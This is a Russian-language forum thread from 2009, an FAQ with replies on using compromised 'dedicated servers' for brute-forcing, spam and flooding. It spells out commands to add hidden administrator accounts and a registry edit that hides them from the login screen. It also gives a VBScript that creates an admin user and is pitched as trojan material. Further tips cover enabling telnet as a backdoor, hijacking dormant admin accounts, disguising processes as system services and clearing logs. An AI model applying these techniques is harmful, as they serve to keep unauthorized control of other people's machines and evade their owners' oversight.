ICQ - форум. Всё про ICQ.  

Вернуться   ICQ - форум. Всё про ICQ. > Underground > Информационная безопасность

Информационная безопасность Всё о безопасности в сети. Любые просьбы о взломах караются по всей строгости закона ;)

 
 
Опции темы Оценить тему
Старый 05.01.2009, 21:22   #1
Участник
 
Регистрация: 05.08.2008
Сообщений: 218

Репутация: 400
По умолчанию BUDSF - Большой FAQ по использованию Dedicate Servers

BUDSF - Big Usage Dedicated Server FAQ - Большой FAQ по использованию Dedicated Server-ов.


1. Общие моменты использования дедиков - INTRO, создание юзера, скрытность:

Q: Что такое дедик?
A: Обязательно к прочтению FAQ по выделенным серверам (Dedicated Servers). Дедик - очевидно, пошло от английского слова "dedicated", что с англиского значит выделенный. То есть Dedicated Server - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация
служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации.

Q: Что можно, а чего нельзя делать на дедиках?
A: Удалённые сервера - практически как домашние компьютеры, за небольшими исключениями - включены 24 часа в сутки, доступны из интернета, это обуславливает специфику их использования - удобно их применять, к примеру, для брута, флуда, спама icq, мыла - всех тех операций, которые требуют продолжительно включенного компьютера. Так же может использоваться для проведения SQL атак (чтобы скрыть ваш IP без использования прокси). Время работы дедика ограничивается лишь вашей наглостью и способностями админа дедика. Правила поведения на дедике:
  • Не лезть к чужим учёткам и их документам.
  • Не удалять ничего лишнего.
  • Не просматривайте через Удалённый рабочий стол динамически меняющийся контент - страницы насыщенные баннерами и прочее. Вы же не играться на этом дедике пришли, а баннеры загружают любой интернет канал - это связано с особенностями сервиса "Удалённый рабочий стол".
  • Не устанавливать никаких программ, копировать всё в уже установленном виде.
  • Не храните документы и программы на рабочем столе. Храните c:\windows\system32\... и глубже
  • Не перегружать дедик. //Спорно, порой это можно, но существует шанс потерять деда.
  • Низя оч сильно нагружать систему , где-то на 30-40% проца и 1\3 памяти (макс на 50-60% проца и половину памяти) ибо это будет заметно. Очень рекомендую залезть в панель управления-> инструменты админа-> службы и врубить там службу telnet (служба терминального доступа к компу), поставив ек в режим автозапуска. Даже если не умеете её юзать - потеряв ценный дедик научитесь (погуглив естессьно). Это как черный ход на комп, если парадный запечатали. (конечно заранее надо разрешить в фаерволе 23 TCP порт, если дедик с фаером работает). Также можите в службах поискать внц\радмин и вырубить (и перевести в ручной запуск, ибо в дисейбл если переведёте то как-то немного палевно, имхо). Мона ещё прошерстить группу Remote Administrator Users на наличие других хакеров на компе :) (их легко определить - обычно в их папках всякие проги для создания бот-сетей, внц-сканеры, гидры, тсс-гриндеры и прочий софт для хака) Только осторожно - не удалите случайно легальных юзеров.

Q: Как скрыть учетку ? Как скрыть моё пр*****ние на дедике?
A: Основано на статье "Скрываем свое прибывание на дедике" by f4kedude (выбраны основные моменты):
1. Если нам досталась XP:
a).Мультиюзерность:
если ломаем winxp sp2\sp3, то сразу после создания акка (или во взломанном акке) сливаем на дедик эти патчи:
Цитата:
Сообщение от NemeZz Посмотреть сообщение
в связи с участвшимися вопросами по патчингу WinXP решил выложить свою [NemeZz] подборку софта для этого дела (будет добавлена в наш FAQ).
(!) После применения каждого патча для его активации необходима перезагрузка.
Сброка прошла тесты на достаточно большом количестве компьютеров и использовать её надо в порядке увеличения цифры, т.е. если не подошёл первый патч - пробуем второй. Если не подошёл второй - третий и т.д. :

1. Лучшее, что работало практически безотказно - одна из сборок MultiRDP (39 Кб). Собрана мной, оттуда выброшен Service\start_tss.exe - стремный он какой-то, работала и без него замечательно.
+ Работала при выполнении мануала на всех дедах
- Сложный для новичка мануал, который надо прочитать и выполнить, если всё правильно сделать - всё должно работать безотказно (Особенно хочу отметить, что распаковывать патч желательно на C:\, чтобы патч лежал не глубже второй поддиректории от корня. В общем - внимательно читайте readme_eng.txt или readme_rus.txt). Второй ньюанс - палится некоторыми АВ, вследствии этого невозможно установить (не всегда можно подружить АВ с ним).

2. Автоматизированные установки Termiserv_XPSP2-SP3_i386_2.1.exe (65 Кб) и Termiserv_XPSP2_i386_1.0.exe (156 Кб). Поставил на одну позицию, т.к. похожее действие - мало надо думать головой, только запустить и соглашаться). Тут вариант - либо всё чудно, либо качаем следующий патч :) Вероятность хорошего исхода при применении этих патчей ~ 60%

3. Сборка TS-Free.zip - по смысловой нагрузке и выполняемым действиям - почти тоже, что и предыдущие сборки. У меня работала на самом низком уровне, но чтобы была - приложил. Вероятность хорошего исхода при применении этого патча ~ 40%.

Так же сразу хочется приложить хорошую утилиту для настройки W2K3 и XP на дедах (чтобы не устанавливать, а сразу запустить и настроить). Стырена у sala

:download:Скачать | Download (557 Кб) (в архиве софт + FAQ о программе с картинками в формате DOC.

[HIDE=3]
Цитата:
Копирование этого поста на другие порталы наказуемо отрезанием яиц.
pass на архивах - grabberz.com
[/HIDE]
и устанавливаем их по очереди. Спросит перезагрузить в конце установки - жмем НЕТ и переходим к пункту б).->
б). Ныкаем свой созданный акк из вин-логона:
На XP - написать в Win-R такую строку
Цитата:
reg add "HKLM\SOFTWARE\Microsoft\Windo ws NT\CurrentVersion\Winlogon\Spe cialAccounts\UserList" /v Admin /t REG_DWORD /d "00000000" /f
, где Admin заменить на имя твоей учётки. Теперь ребутим дедик, дабы активировать мультиюзерность.
2. Ныканье файлов и прог
Дабы не смущать админа новой папкой акка в документз энд сеттингс скрываем её со всеми файлами и подкаталогами (свойства -> атрибуты: ставим птичку на "скрытый" и применить). Все свои файлы - создать для них папку какую-нить (скажем inst) например в c:\windows\system32 и тож скрытые атрибуты ей поставить :). Есть еще способ - программка Hide Folders XP (с помощью неё можно более глубже скрыть файл, или вобще доступ к папке\файлу запретить\запоролить).
3. Запуск прог под админским акком или под алл юзерс
Ну во-первых кидаем нужную прогу в документз энд сеттингс\Акк админа(или, если хотите чтоб по запускалось от любого пользователя - All Users)\Главное меню\Программы\Автозапуск (можно автозапуск проги через реестр сделать), ставим скрытые атрибуты опять же. Теперь надо как-то сныкать прогу из вин-панели и трея, а ещё желательно в процессах маскирнуть как-нить =). Для этого есть много прог (я предпочитаю PS Tray Factory Download | Скачать (~ 1.8Мб) Зеркала _http://depositfiles.com/files/11ibapu01 и _http://upwap.ru/270356, Ибо есть русский язык, легка в управлении, очень функциональна(не забываем в меню выбрать чтоб сама прога свой значек из трея и винбара скрывала!). А для сокрытия в процессах юзаем ResHacker, который позволяет переименовывать процесс, описание к нему делать, от кого запущен и т.д. (как юзать гуглите сами, небуду расписывать подробно ибодолго). Основная идея - поставить процессу проги название типа svhost, описание какого-нить системного проца и запуск от имени system.
Другие полезные ссылки:
- HideToolz.exe (91 Кб) - хайд пройесса в диспечере задач (не всегда пашет). Cтырил [XTT] с форума по ассемблеру
- clearlogs.zip (14 кб) - утилита для чистки логов (в архиве парметры запуска в ярлыках) (!) Палится многими АВ, в частности нодом и каспером.

Q: А через что заходить под своей учеткой????
A: Подключиться к дедику можно с помошью встроеного в ОС windows утилиты: Подключение к удаленному рабочему столу. Пуск => Программы => Стандартные => Связь => Подключение к удаленному рабочему столу. Можно еще так: Пуск => Выполнить => mstsc. Еще одно утилита для подключение к дедику - это [BL4CK] VNC Viewer: Authentication Bypass. Просто запусти ее и вводи ip адрес дедика. Можно еще Радмином юзать дедик если он установлен на дедике.

Q: Создание нового юзера
A: Нажмите Win-R, вводим cmd.exe, туда через Clipboard копируем следующие строки
Цитата:
net user имя пароль /add
net localgroup Administrators имя /add
net localgroup "Remote Desktop Users" имя /add
net accounts /maxpwage:unlimited
exit
На специфичных дедах типа Китая, Германии, Иордании, Австрии, Болгарии для определения групы Администраторов (куда нам надо добавится), используем команду net localgroup. Группы администраторов могут иметь имя "Администраторы", "Administradores", "Administrateur" и прочее.
Альтернатива создание пользователя, локального администраторачерез VBscript. Текст скопировать в текстовый файлик, переименовать текстовый файлик в *.vbs .
Скрипт создает локального пользователя "LocalAdmin" с паролем "123456789"
Цитата:
Set objNetwork = CreateObject("WScript.Network" )
strComputer = objNetwork.ComputerName

Set colAccounts = GetObject("WinNT://" & strComputer & "")
Set objUser = colAccounts.Create("user", "LocalAdmin")
objUser.SetPassword "123456789"
objUser.SetInfo

Set objGroup = GetObject("WinNT://" & strComputer & "/Администраторы,group")
Set objUser = GetObject("WinNT://" & strComputer & "/LocalAdmin,user")
objGroup.Add(objUser.ADsPath)

Const ADS_UF_DONT_EXPIRE_PASSWD = &h10000
UserFlags = objUser.Get("UserFlags")
objPasswordExpirationFlag = UserFlags OR ADS_UF_DONT_EXPIRE_PASSWD
objUser.Put "userFlags", objPasswordExpirationFlag
objUser.SetInfo
Преимущество скрипта - его можно превратить в трой, создающий юзера. Утилит превращения vbs в exe множество - за ними в Гугл.

Q: не могу создать учетку:
коротко: проблема в "The Workstation service", он -- has not been started.
Попытался добавить уч. через cmd (вкладки локальные юзеры нет), но главное - учетка не появилась и в dsa.msc .
Какие есть варианты? ) А вообще учеткам лучше какие имена давать?
A: Если есть доступ - попробуй через него посмотреть, чтобы были запущены все нужные службы, если что - позапускай. Как альтернатива - в cmd по net user имя смотришь время последнего логона, потом любую заброшенную учётку админа берешь (в которую уже год не заходили) и меняешь пароль на свой и пользуешься.
Если через день не заблочат - те повезло и бушь год пользоваться этой учёткой беспалива. Админы замечают нового "старого" админа через раз. Это из моей [NemeZz] практики.
Имена - как служб, которые установлены на компе - типа TeamViewer, SQLserver, SQLuser, console, system и подобные.

Q: пытаюсь создать учетку-пишет:

A: в чем проблема? пароль небезопасен. Проверь длину пароля, надёжность и т.п.
Поставь норм пароль вроде W#4t%b

Q:
Цитата:
находим там вкладку Локальные пользователи и Группы

wtf!? Хде у меня эта вкладка?:how: Как поменять пароль на дедике?
A: Пароль меняется не на дедике, а на учётке. из командной строки просто (в cmd.exe) -> net user Имя Новый_пасс
Иногда не в lusrmgr.msc, а в dsa.msc лежат юзеры. Т.е. доменные. Это круче - там спрятаться проще, да и прав поболе.


2. Проблемы при логоне:

Q:
Цитата:
я создал учетку , но как выхожу из деда , через 1 мин захожу а он выключен :((.
или
Цитата:
помогите идёт дисконект от дедика когда его закрываю, минут через 10 меня не кто не дисконектит сам дедик!! как я понял дисконект идёт когда окно не активно! как это исправить:?
A: проблема в том, что при выходе через 5 мин вырубается сессия. Лечится так: (проверять всё).
1. My Computer - Правой кнопкой мыши - Manage - Local users and groups - Users - Твой акк - Правой кнопкой мыши - Properties - Вкладка Sessions - Везде должно стоять Never.
2. gpedit.msc - Computer... -Admini ...- Terminal Server... - смотришь, что сконфигурировано. или
3. tscc.msc - RDP - проверяй вкладки.
4. net accounts /forcelogoff:no
5. net accounts /maxpwage:unlimited
6. Start - Adm tools - term serv conf -connections -sessions:
снять первые 2 галки или active desktop -enable

Q: Захожу сюда: My Computer - Правой кнопкой мыши - Manage и не могу найти там никаких Local users and groups. Можно скрин?
A:
Окно Менеджмента (compmgmt.msc) с отключенными локальными пользователями.

Это означает, что вы плохо читали "FAQ по выделенным серверам (Dedicated Servers)" - компьютер является держателем домена и на нем отключены локальные юзеры. Тогда управление юзерами - start/controlpanel/administrative tools/active directory users and computers, или проще: run -> dsa.msc или еще лучше - через cmd net user.

Q: А вот такое где править? (в secpol.msc не нашел что-то...)

A: Локальному юзеру запрещен локальный вход в систему.
В 2003 лечится так secpol.msc -> Local Policies -> User Rights Assignment ->:
в пунктах Allow log on locally и Allow log on through Terminal Services - юзер должен присутствовать в списке
в пунктах Deny log on locally, Deny access to this computer from the network - соответственно отсутстсвовать.

Q: при входе на сервак появляется раб. стол без пуска и т.д., просто фон и все. как с этим бороться ?
A: Или до конца ты не смог залогинится, или пуск скрыт. попробуй вызови какое нибудь окно горячими клавишами, если уверен что залогинился. например, win+break или лучше -
1. При запуске mstsc в параметрах на вкладке "Локальные ресурсы" переставь на "Запускать на том компе". Т.о. ты будешь нажимать Ctrl-Alt-Del на том компе, а не на своём.
2. Проще всего -нажми Ctrl-Shift-Esc когда видишь синий экран. Тогда появится диспетчер задач. Действительно проблема в том, что не стартует эксплорер.
Далее - как посоветовал f4kedude, Файл-Новая задача explorer.exe (больше ничего не пиши, т.к. системные папки автоматически находятся в переменной Path (окружение).
Это запустит эксплорер. Всегда помогало. Эксплорер кстати не стартует из-за сбившихся параметров (хз почему) при настройках экрана. У меня после "чёрного" экрана получалось к таким дедам подключиться уменьшив количество цветов до 256 на вкладке Экран после нажатия Параметры и уменьшив там же разрешение. Доходило порой до того, что у себя на компе битность уменьшал с 32 бит до 16 и только тогда заходило [Это просто на рабочем столе у себя - Свойства - Параметры]. Ктулху да и только.

Q: Такого никто не видел?

ctrl+alt+del и прочие заклинания не помогают (
A: видел) дофига такого. от камер наблюдения... до управления светом/музыкой/и_тп в театре)
обычно прикалывался с этим и забивал:)

Q: создал я учетку на дедике, пытаюсь зайти на учетку и загрузка параметров останавливается на загрузке ие 6, как можно исправить?
A: встречал иногда, винда жаждит переустановки
зайди в адмиский акк, вылогофь свой созданный, зайди в созданый снова, там будет следуйщий этап настройки параметров для учётки, и так делай пока не зайдёт полноценно)

Q: а то у меня в vnc одна винда а в рдп другая
A: Это два разных компа. Т.к. на vnc наверное ай-пи динамический. попробуй ipconfig в консоли и посмотретЬ, что там за ипы. Если 192.*, 10.* или 174.* - динамический. На такой не подключишься по RDP.
Еще можно этот ип пропинговать и посмотреть, с какого ипа приходят ответы. Если различные - точно динамический.

Q: что за ошибка?
A: Если в английском то переведу (суть): "Для удалённого управления компом надо иметь права терминального управления серваком. По умолчанию участники группы Remote Desktop Users имеют эти права. Если вы не участник этой группы, или находитесь в другой группе, не имеющей таких прав, то вы должны добавить их вручную"
ты не сможешь зайти через рдп потому что у тебя нет таких прав и они должны быть назначены админом.
net localgroup "Remote Desktop Users" username /add
на удалённом компе. Видимо, придётся тебе коннектиться по vnc.
Или настроена групповая политика так. Или политика безопасности. в secpol.msc смотри User Rights - вторая группа - там Access to logon throw Terminal Server. Если там только Administrators - добавь ся в группу админов. Если только админ чисто - добавь себя в "Access to logon". И проверь там же, чтобы не было учётки в Deny logon...

Q: как можно включить удал в винде 2000? как в win 2000 Advanced Server разрешить удалённый рабочий стол?!Если правой кнопкой по моему компьютеру,свойства,то там нету заветной закладки Удалённые сеансы и т.п.
A: gpedit.msc -> Administr Templates -> Windows Components -> Teminal Service смотришь все пункты (установлены или нет).
secpol.msc - Local Policy -> User Assigments проверить все Deny и Access
Юзер должен быть админом или как минимум входить в группу Remote Desktop Users. Полный материал: _http://www.osp.ru/win2000/2001/04/174781/_p2.html
Других причин незалогиниться - только фаер и роутер, да больше и не вспомню.

Q: Как проверить - сидит ли кто-то на консоли (т.е. непосредственно перед монитором деда)?
A: Проверить можно так: в Диспетчере задач на последней вкладке смотрим, кто за компом, есть ли сессия Console. Если нет - гуд, иначе - смотрим все задачи, если там есть logon.scr - значит сейчас активна заставка у админа, (часто они не отключают заставку), если нет её - знач надо быть оч акrуратным, сессия мб активна. Еще можно в tsadmin посмотреть, когда кто загружен.

Q: Почему при входе на дед выскакивает окно "terminal server has exceeded the maximum number of allowed connections."? на деде никто не сидит! с админки могу зайти, а с учетки которую я создал - нет! как можно увеличить максимальное кол-во людей на деде?
A: Винда не лицензированая. На деде включено максимальное колличе одновременных учётных записей для нелицензированой винды - три. Выхода два:
1. Чтобы исправить, заходим под Админа, и нажимаем там LOG OFF! Всё. Теперь заходим в нашу учетку и всё ок.
Цитата:
логоффнись с админа (НЕ ЗАКРЫВАЙ ТУПО ОКНО, а Start - Log Off Administrator), и заходи под новой учёткой.
cmd.exe -> tsadmin - и убирай зависших пользователей. Аналогично Ctrl-Alt-Del и Logoff всех, кого не жалко - именно они тебе мешают войти.
2. Если это не возможно - подождать. От себя: У меня [JavaScript] был такой дед. Ждал два месяца :)
Как недопустить такого - tscc.msc -> RDP -> Session смотрим сколько сессий разрешено, если 2 то --> всем юзерам что любят висеть в дисконнекте, поставить лимит 10 минут.
Самым грамотным решением в такой ситуации будет Лицензирование Терминального Сервера. Позже будет выложена инструкция (Теоретически лицензирование можно и по RDP провести).

Q:
Это временная ошибка я надеюсь?
A: деду капец или жди может откачают его

Q: У меня такая проблема: когда захожу на дед появляется окошко "Shutdown event tracker" и дальше предлагается выбрать причину по которой "computer shut down unxpectedly". Может, кто нибудь знает в чем дело и что мне следует делать.
A: Что такое Shutdown Event Tracker? Это диалоговое окно при завершении работы (перезагрузке) windows server 2003 которе хочет чтоб вы обьяснили (и записали в event log) причину своих действий (windows style чё поделаешь). Если оно вам ненадо убираем так: Пуск -> выполнить -> GPEDIT. MSC, в появившемся окне Редактора групповых политик Group Policy перейди на Local Computer Policy > Computer Configuration > Administrative Templates > System и выбери пункт Display Shutdown Event Tracker. Установим этот параметр в положение Disabled. Готово!

Q: При попытке логина на дед W2K логинит и сразу пишет Save... и выходит. Что це таке?)
A: я сталкивался с такой проблемой, только на вин 2к3, ответ оказался очень простой: сервер загружен в безопасном режиме, все рдп коннекты сразу же вырубаются

Q: добыл дедик VNC (2003), создал на нем учетку. при входе на дед ввожу созданный логин с пассом. вылетает окно : To log on this computer, you must have Terminal Server User Access permissions on this computer. и т.д.
A: Ты создал учётку, но не дал ей права на вход средствами терминала...

Q: вот проблема:
суровый админ))
A: Он не суров, он образован. Права ограниченные) у меня гдето был дед, куда заходишь и там чисто эксель открыт, ну чуть покопавшись можно командную строку запустить, тока толку то, прав для создания учетки нет (Нужно любыми путями вызвать Task Manager или Run. Способы - горячие клавиши - Ctrl-Shift-Esc, Ctrl-Alt-Del, Win-R, Win-Break, Win-E, просто кнопка Win)

Q: Вместо винды вот такая хренатень

Незнаете что там можно натворить ?
A: Ты зашёл на деда просто, а тот под удалёнкой сам к се приконекчен. Попробуй вырубить, пробуй Ctrl-Shift-Esc - запустить explorer и в целом - не стесняйсо)


3. Определение инфы о дедике:

Q: Может кто знает, лёгкую прогу которая при запуске выдает открытые и закрытые порты?
A: cmd.exe -> netstat в консоли. Можешь попробовать netstat -ano или netstat -an.
На локальном компе более удобные варианты контроля cports или TcpView. На удалённом компе - nmap.

Q: Помогите плз, открываю порт 3389, а он нифкакую не хочет коннектиЦЦа, выдает ошибку, какбудто порт закрыт, может какой-нить антивирь или файервол закрывать этот порт???
A: Бывает дедик находится за NATом в локалке. А уж как там NAT настроен одному Богу известно. Бывает только VNC пропускает, даже IE в инет не выходит. Так что как ни настраивай RDP, NAT его все равно не пропустит.

Q: как определить дедик под натом или нет ?
A: win+R --> cmd --> ipconfig --> ?
Цитата:
10. 0. 0. 0 - 10. 255.255.255
172. 16. 0. 0 - 172. 31.255.255
192.168. 0. 0 - 192.168.255.255
Если машина весит на айпишнике из этих диапов, то она за натом.

Q: Как определить скорость, страну, IP деда?
A: Скорость, айпи и страна деда проверяется на _2ip.ru. Как вариант - использовать другой измеритель, например - _http://bandwidthplace.com/ (американский), _speedtest.net, _http://www.hot.ee/vp/speed.htm. Ну если так хочется 2ip.ru, то можно ручками прописать в адресной строке браузера _http://2ip.ru/speed/ и будет тебе тест.


to be continued...

Последний раз редактировалось NemeZz; 10.01.2009 в 01:47.
NemeZz вне форума  
Плюсанули NemeZz — 5 :
Старый 05.01.2009, 21:46   #2
Участник
 
Аватар для metal
 
Регистрация: 31.10.2003
Сообщений: 568

Репутация: 1627
По умолчанию

Замечательный фак. Прицепил. Надеюсь, его будут читать )) (а не задавать те же самые вопросы через 3 поста)
__________________
Красивые номерки - niceuin.ru
info
icq [553-555]
metal вне форума  
Старый 05.01.2009, 21:56   #3
Участник
 
Аватар для DieHard
 
Регистрация: 12.03.2006
Сообщений: 707

ICQ: 99836

Репутация: 3487
Отправить сообщение для DieHard с помощью Skype™ Twitter
По умолчанию

Да побольше бы такого материала, желательно бы ещё и авторского для нашего проэкта. Респект.
__________________
Святая картошка!
Воўка, мне нялоўка! Я ж ужо ўсем піздануў што у палітыке у мяне снароўка!
DieHard вне форума  
Старый 05.01.2009, 21:58   #4
Участник
 
Регистрация: 28.02.2008
Сообщений: 63

Репутация: 126
По умолчанию

Класс! Спасибо.
Chaser306 вне форума  
Старый 05.01.2009, 22:19   #5
Участник
 
Регистрация: 27.01.2008
Сообщений: 138

Репутация: 312
По умолчанию

После такого можно тему "Проблемы дедиками" сносить)
$Atlet$ вне форума  
Старый 05.01.2009, 22:41   #6
Участник
 
Регистрация: 05.08.2008
Сообщений: 218

Репутация: 400
По умолчанию

$Atlet$, ))) Я оттуда всё выбрал, что только можно было. + Грабберовская такая же тема...
Хотя Джуди сказал что у меня не хватает про проблемы при слабом коннекте, но я что-то не встречал у людей таких проблем)
NemeZz вне форума  
Старый 07.01.2009, 13:30   #7
Участник
 
Регистрация: 24.10.2008
Сообщений: 35

Репутация: 0
По умолчанию

Спс статья супер только можно про логи или там я есть я просто не нашел?
__________________
Забанен за злостное распространение порнушки
Xaker95 вне форума  
Старый 07.01.2009, 13:49   #8
Участник
 
Аватар для qwerty)
 
Регистрация: 10.02.2007
Сообщений: 45

Репутация: 37
По умолчанию

спасибо за фак,очень хорошо и интересно написано
__________________
Из тех,кто любит одеваться очень просто,узкие джинсы,обычные кеды и Поло Лакоста(с)CentR
qwerty) вне форума  
Старый 07.01.2009, 14:18   #9
Участник
 
Регистрация: 11.04.2008
Сообщений: 26

ICQ: 2438587

Репутация: 1
По умолчанию

Все пользуются ResHacker'ом для маскирования имени и расширении и в процессах?))
Escape вне форума  
Старый 07.01.2009, 14:49   #10
Участник
 
Аватар для LittLe
 
Регистрация: 28.04.2007
Сообщений: 1,412

Репутация: 5034
По умолчанию

Класс, собрал все в одном месте, почет:)
__________________
LittLe вне форума  
Старый 07.01.2009, 14:56   #11
Участник
 
Аватар для LittLe
 
Регистрация: 28.04.2007
Сообщений: 1,412

Репутация: 5034
По умолчанию

Цитата:
Сообщение от NemeZz Посмотреть сообщение
Q: Как скрыть значёк программки в трее?
A: для скрытия значка в трее(устанавливаем PS Tray Factory заменяем ехе и радуемся) Download | Скачать ~ 1.8Мб
ет самое, зачем прога, когда можно руками сделать?
Скрин приатачил;)
Выбираем Always hide ;) , а потом когда понадобиться теже шаги, только тыкаем Always show , вот и все:)
Миниатюры
Нажмите на изображение для увеличения
Название: asechka_ded.JPG
Просмотров: 593
Размер:	244.5 Кб
ID:	11215  
__________________
LittLe вне форума  
Старый 07.01.2009, 16:44   #12
Участник
 
Аватар для Sirob
 
Регистрация: 14.02.2008
Сообщений: 293

Репутация: 153
По умолчанию

LittLe, Кружечек со знаком < нажми. Убрать из трея и скрыть - разные вещи.
__________________
Password List Mask Creator_08.06.14_RC
# = 3 x 100001003
Sirob вне форума  
Старый 07.01.2009, 17:17   #13
Участник
 
Аватар для LittLe
 
Регистрация: 28.04.2007
Сообщений: 1,412

Репутация: 5034
По умолчанию

Sirob, Ну админыже не смотрят туда =\
Один из миллиона туда посмотрит%)
__________________
LittLe вне форума  
Старый 07.01.2009, 18:25   #14
Участник
 
Регистрация: 24.10.2008
Сообщений: 35

Репутация: 0
По умолчанию

Ну кто может подщсказать про логи креалогс это единственный способ логи уничтожить??
__________________
Забанен за злостное распространение порнушки
Xaker95 вне форума  
Старый 07.01.2009, 21:54   #15
Участник
 
Регистрация: 05.08.2008
Сообщений: 218

Репутация: 400
По умолчанию

LittLe, глупо так делать. Если уж делать - то делать правильно, или не делать совсем. "Ломать, так сервак, *****, так королеву" ©b3

Escape, редко кто смотрит заголовки процессов через левые Таск менеджеры. РесХакер - для параноиков, желающих крайне не палиться на мегодеде. Хотя практика подсказывает, что надо проще к этому относиться. Меньше ценишь - меньше растройство при потере, помнишь только что хорошего дед сделал за своё существование, а не что мог бы сделать. Рекомендую такую философию к этому цифрокоду.

Цитата:
Сообщение от Xaker95 Посмотреть сообщение
Ну кто может подщсказать про логи креалогс это единственный способ логи уничтожить??
http://grabberz.com/showpost.php?p=178948&postcount=3
NemeZz вне форума  
Старый 09.01.2009, 01:41   #16
Участник
 
Регистрация: 11.04.2008
Сообщений: 26

ICQ: 2438587

Репутация: 1
По умолчанию

Цитата:
Сообщение от NemeZz Посмотреть сообщение
Escape, редко кто смотрит заголовки процессов через левые Таск менеджеры. РесХакер - для параноиков, желающих крайне не палиться на мегодеде. Хотя практика подсказывает, что надо проще к этому относиться. Меньше ценишь - меньше растройство при потере, помнишь только что хорошего дед сделал за своё существование, а не что мог бы сделать. Рекомендую такую философию к этому цифрокоду.
PS Tray Factory-дейсствительна крутая прога и очень легкая в обращений.
А проблему со скрытием в процессах я решил без РесХака:
Имя учетки изначально Services. Имя своего ПК задал System, остаёся переименовать наш brutal.exe допустим какой нибуть host.exe
Итог: наш брут в процах видать как host.exe - SYSTEM где SYSTEM-имя моего ПК(ранеее изменённое в системе моего ПК.)

У меня со вчерашнего дня ужасно лагать инет начал и с.н.-дедик((
Escape вне форума  
Старый 09.01.2009, 12:48   #17
Участник
 
Регистрация: 05.08.2008
Сообщений: 218

Репутация: 400
По умолчанию

4. Использование браузеров на дедике. Заливка файлов на дед.

Q: Дед win 2000 , создаю учетку, все как положено, захожу по ней, как только открываю браузер (IE) выскакивает окно с настройками подключения к инету!

Как это обойти?
A: Это просто настройка IE. Не пугайтесь, выбирайте пункт три, читайте, там всё понятно.

Q: не могу на деда скопировать ссылку с компа,и никакие файлы скопировать не могу, ни правой кнопкой мышки,ни сочетанием клавиш,приходится прокси через рапиду заливать.
A: Тока через рапиду или установив радмин или подобную приблуду и через её сервисы кидать. Но радмин лично у ми порой криво становился - деды в даун уходили, так что не рекомендую.

Q: У меня такая проблема - IE на дедике не работает, просто тупо не открывает страницы, как будто подключения по инету нету.. Что делать и кто виноват?!
A: в IE вкладка Сервис-->Свойства обозревателя-->Безопасность. Выбрать иконку Интернет(глобус), чуть ниже кнопка "Другой..." далее включаем все что нужно, в том числе и загрузку файлов.

Q: Как ещё(кроме как через браузер) можно передать файлы на дед?

A: 1. Залей на ФТП мазилу. На какой FTP можно залить файлы? - http://www.pochta.ru/ - что-то вроде этого получается ftp://user.nm.ru@ftp2.nm.ru/ вводишь свой пароль и вуаля.
2. Когда через mstsc подключаешься,в опциях можно подключить свой винт, кардинально - но скопируешь что надо, потом заливай туда портабельную оперу или лисицу и сиди через них, хотя это когда тупо запрещен доступ в ие, если дело хуже - если нет корпоративного проксика - заливай софт, какой думаешь юзать и юзай, если есть проксик - забей или ищи способ узнать проксики, хотя такой запущенный способ пару раз видел.
П.С. Винт будет виден всем, кто за компом будет, так что скопировал/отключился, вырубил винт. Минимум времени чтобы. Сетевой диск вариант, но надо пояс просчитывать и ночи ждать на деде. Eсли ссылки не открываются то ты в поставь галочку Дисковые устройства в свойствах подключения к удаленному рабочему столу на вкладке Локальные ресурсы, тогда на дедике в моем компьютере появятся твои диски. (Mstsc -- параметры --- локальные рессурсы -- дисковые устройства)

P.S.: тока действуй быстро а то админ в мой комп зайдет а там ВАЙ ВАЙ новый жесткий

Q: Имею дедик, но инет на нём тока через спец проксю (так сделано что бы работники не шарились в инете в рабочее времи) проксю эту знаю.А вот меня заинтересовало,можно ли будет делать скан,брут и т.п. на нём?!
A: Ставишь на дедик с Proxifier, в настройках прописываешь проксю.
Всё, теперь все коннекты в инет от дедика будут идти через проксю.

Q: Вообщем проблема такая на некоторых дедах
Когда я открываю браузер и пытаюсь перейти по какой либо странице он не может эотго сделать!Тупо пишет что типо невозможно подключиться к серверу и так ко всему ) ... и ФТП тоже не пашет ) Что делать ?
A: Попроси админа заапрувить все порты на роутере под твой дед)))) Другого варианта не вижу, кроме как приконектится к роутеру и взломать пасс... (Что такое Роутер ? ===> http://ru.wikipedia.org/wiki/Роутер Не стесняйтесь задавать вопросы Википедии и гуглю).

Q: воть)где мона отключить это ограничение?

A: tools/internet options там во вкладке секъюрити нажми кастом лэвэл и найди Downloads, все радиобатоны на Enable

Q: Скажите пожалуйста, что делать, если дед блокирует все файлообменники? В какой директории искать эту программу, что бы ее удалить?
A: Программа может быть любая. Ищи... Если программы блочащей нет, а тут используется роутер - тогда можно выкидывать дед, или заливать сразу со своего компа.


Q: А никто случаем не знает, почему на азиаццких дедах http://2ip.ru не пашет(уже 3 китай\япония, причем все из совершенно разных диапозонов хакнул, и на всех так)? Прост любопытно, почему они этот сайт бояцо (и походу блочат как-то, только не пойму как, но есть предположение что в эксплорере он записан в ненадёжные или что-то вроде того). Жаль незнаю китайский\японский - атоб восстановил справедливое отношение к этому хосту. А по аналогии немогу разобрацо куда лезть, ибо эксплорера 6 нету под рукой :)
A: оно на всех компах осёл похож.
Сервис - свойства обозревателя. Безопасность - Trusted sites - добавь 2ip.ru.
Возможно еще IIS блочит, но тогда бы при загрузке ты видел страницу HardAdmin.htm Вырубается через appwiz.cpl - Компоненты виндоуз - уберешь в IIS For Administration group
Может фаер блочит... Других причин не вижу. Пробуй другие сервисы, на _2ip.ru свет клином не сошёлся.

Q: Как на деде можно включить поддержку java-скриптов. А то уже надоело ))) не посмотреть канал инет))
A: Таким образом включишь JS на сайт, который посещаешь.

Для каждого сайта надо делать также, чтобы JS включить.

Q: Сбрутил дед ... не заходит на .ru тока на .com и то не скачать нечего ... что делать ?
A: Через анонимайзер/прокси на ru если надо. Заливать файлы через расшаривание (локальные ресурсы - разрешить дисковые устройства)

5. MISC. Настройки и твики деда:

Q: как изменить минимальную длину пароля в вин2003?
A: Local Security Settings -> Account Policies -> Password Policy: Minimum password length.
